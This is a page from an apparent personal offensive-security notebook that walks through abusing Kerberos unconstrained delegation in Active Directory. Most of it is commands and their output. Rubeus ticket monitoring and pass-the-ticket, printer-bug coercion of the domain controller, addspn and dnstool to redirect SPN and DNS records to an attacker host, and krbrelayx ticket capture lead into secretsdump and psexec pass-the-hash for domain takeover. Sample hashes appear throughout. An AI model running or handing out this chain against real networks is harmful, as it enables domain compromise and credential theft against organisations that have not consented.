VulnableOne
  • πŸ§˜β€β™‚οΈAbout Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
      • Theory
        • Nmap
        • Wireless
        • OSI Model - TCP/IP
        • R* Service
        • Hash
        • Solaris
        • SIP
        • Cisco Password Encryption
        • Time to Live
        • Windows
          • WMIC
          • IIS Version
          • Windows Version
          • Active Directory
        • Linux
        • Database
          • Page 7
          • MSSQL
          • PostgreSQL
          • MySQL
        • Asymmetric Encryption
        • Symmetric Encryption
        • Tools
        • ICMP
        • IP Address
        • VLAN
        • Acronyms
        • HTTP Status
        • HTTP Method
        • Protocol
        • Common Ports
    • πŸ§™β€β™‚οΈAD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • πŸ₯·Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • πŸ“Empty!!!
  • Course Review
    • πŸ‘¨β€πŸŽ“Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • βœ…Admirer (Easy)
              • βœ…Bashed (Easy)
              • βœ…Beep (Easy)
              • βœ…Blocky (Easy)
              • βœ…FriendZone (Easy)
              • βœ…Irked (Easy)
              • βœ…Lame (Easy)
              • βœ…Mirai (Easy)
              • βœ…Networked (Easy)
              • βœ…Nibbles (Easy)
              • βœ…OpenAdmin (Easy)
              • βœ…Sense (Easy)
              • βœ…Shocker (Easy)
              • βœ…Sunday (Easy)
              • βœ…Tabby (Easy)
              • βœ…Traverxec (Easy)
              • βœ…Valentine (Easy)
              • βœ…Cronos (Medium)
              • βœ…Haircut (Medium)
              • βœ…Jarvis (Medium)
              • βœ…Magic (Medium)
              • βœ…Nineveh (Medium)
              • βœ…Node (Medium)
              • βœ…Poison (Medium)
              • βœ…SolidState (Medium)
              • βœ…TartarSauce (Medium)
            • Window Boxes
              • βœ…Arctic (Easy)
              • βœ…Active (Easy)
              • βœ…Blue (Easy)
              • βœ…Bounty (Easy)
              • βœ…Devel (Easy)
              • βœ…Forest (Easy)
              • βœ…Granny (Easy)
              • βœ…Granpa (Easy)
              • βœ…Jerry (Easy)
              • βœ…Legacy (Easy)
              • βœ…Optimum (Easy)
              • βœ…Bastard (Medium)
              • βœ…Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • Abuse from Windows System
  • Verify Print Spooler
  • Monitor
  • Printer Bug
  • Pass The Ticket
  • Abuse from Linux System
  • FindDelegation
  • Addspn
  • dnstool
  • krbrelayx
  • printerbug
  • Export Ticket:
  • Impacket-Secretsdump
  • Impacket-Psexec
  • Cleanup
  • Remove SPN
  • Remove DNS Record
  1. Offensive Treasure
  2. AD Attack
  3. Kerberos Attack

Unconstrained Delegation

PreviousASREPRoastingNextConstrained Delegation

Last updated 1 year ago

Abuse from Windows System

First we have to compromised Web Server or Unconstrained Delegation System.

Verify Print Spooler

PS C:\> dir \\dc01\pipe\spoolss


    Directory: \\dc01\pipe


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
                                                 spoolss

Monitor

Launch Rubeus from an administrative command prompt 

C:\Tools>Rubeus.exe monitor /interval:10 /filteruser:DC01$

Printer Bug

C:\Tools>SpoolSample.exe DC01 WEBSRV01

Pass The Ticket

Rubeus.exe ptt /ticket:doIFIjCCBR6gAwIBBaEDAgEWo...

With Domain Controller ticket, we can used it for DCSync Attack, and craft golden ticket.

Abuse from Linux System

FindDelegation

└─$ impacket-findDelegation vulnableone.local/khan.chanthou:Password123

Addspn

We have to compromised password hash of Unconstrained Delegation Machine

└─$ python addspn.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -s HOST/evil.vulnableone.local -q dc01.vulnableone.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target

Verify on computer properties

PS C:\Tools> Get-DomainComputer -Unconstrained | select samaccountname, serviceprincipalname

samaccountname serviceprincipalname
-------------- --------------------
WEBSRV01$       {cifs/evil.corp.com, WSMAN/EVIL, WSMAN/evil.corp.com, TERMSRV/EVIL...}

The β€œβ€“additional” flag will modified service principal name of the machine account via the β€œmsDS-AdditionalDnsHostName” attribute to include the β€œHOST/evil.vulnableone.local” service principal name.

└─$ python addspn.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -s HOST/evil.vulnableone.local dc01.vulnableone.local --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

dnstool

Utilizing the β€œdnstool” Add a DNS record pointing to the attacker's host:

└─$ python3 dnstool.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -r evil.vulnableone.local -d 10.10.10.11 --action add dc01.vulnableone.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Check that the record was added successfully

└─$ nslookup evil.vulnableone.local 10.10.10.10  
Server:         10.10.10.10 
Address:        10.10.10.10#53

Name:   evil.vulnableone.local
Address: 10.10.10.11

krbrelayx

Start krbrelayx.py providing AES key of the owned computer account that was dumped earlier in order to be used for Kerberos authentication. Two listeners will be created by default SMB and HTTP.

└─$ python krbrelayx.py -aesKey 13aa2b4efc4bbab2ec9804cd9c39965ce4a6a6438e2f12ca124c4b75ff47127
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

printerbug

└─$ python printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f vulnableone.local/WEBSRV01\$@dc01.vulnableone.local evil.vulnableone.local
[*] Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attempting to trigger authentication via rprn RPC at dc01.corp.com
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked

Export Ticket:

└─$ export KRB5CCNAME=./DC01\$@VULNABLEONE.LOCAL_krbtgt@VULNABLEONE.LOCAL.ccache 

└─$ klist                                                                                                                        
Ticket cache: FILE:./DC01$@VULNABLEONE.LOCAL_krbtgt@VULNABLEONE.LOCAL.ccache
Default principal: DC01$@VULNABLEONE.LOCAL

Valid starting       Expires              Service principal
02/25/2024 13:30:16  02/25/2024 23:29:38  krbtgt/VULNABLEONE.LOCAL@VULNABLEONE.LOCAL
        renew until 03/03/2024 13:29:38

Impacket-Secretsdump

impacket-secretsdump dc01.vulnableone.local -dc-ip 10.10.10.10 -just-dc-user 'vulnableone\administrator' -k -no-pass

Impacket-Psexec

└─$ impacket-psexec vulnableone.local/administrator@dc01.vulnableone.local -hashes aad3b435b51404eeaad3b435b51404ee:a6b922ecd4785badb8b50bc175c10134

Cleanup

Remove SPN

└─$ python addspn.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -s HOST/evil.vulnableone.local -r DC01.vulnableone.local --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Remove DNS Record

└─$ python dnstool.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -r evil.vulnableone.local -d 10.10.10.11 --action remove DC01.vulnableone.local      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Target has only one record, tombstoning it
[+] LDAP operation completed successfully
πŸ§™β€β™‚οΈ